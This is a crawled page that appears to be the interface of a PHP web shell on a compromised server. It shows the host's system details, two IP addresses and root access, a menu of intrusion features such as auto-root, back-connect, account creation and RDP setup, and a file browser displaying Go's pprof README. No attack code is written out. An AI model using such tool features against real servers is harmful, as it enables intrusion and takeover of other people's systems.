Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
cmd /
pprof /
[ HOME SHELL ]
Name
Size
Permission
Action
README
905
B
-rw-r--r--
doc.go
358
B
-rw-r--r--
pprof.go
8.7
KB
-rw-r--r--
readlineui.go
3.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
This directory is the copy of Google's pprof shipped as part of the Go distribution. The bulk of the code is vendored from github.com/google/pprof and is in ../vendor/github.com/google/pprof. Two important notes: 1. Using github.com/google/pprof directly (for example, after installing with "go get") should work with Go programs, but we cannot guarantee that. What we test is that the "go tool pprof" shipped with each Go release works with programs from that release. 2. Pprof is used inside Google for C++, Java, and Go programs. Because it was developed for that broader context, it is overgeneralized when used here for the specific use case of profiling standard Go programs. However, we've left the abstractions intact in order to share updates between our vendored copy and Google's internal one. Please do not take the level of abstraction in this program as an example to follow in your own.
Close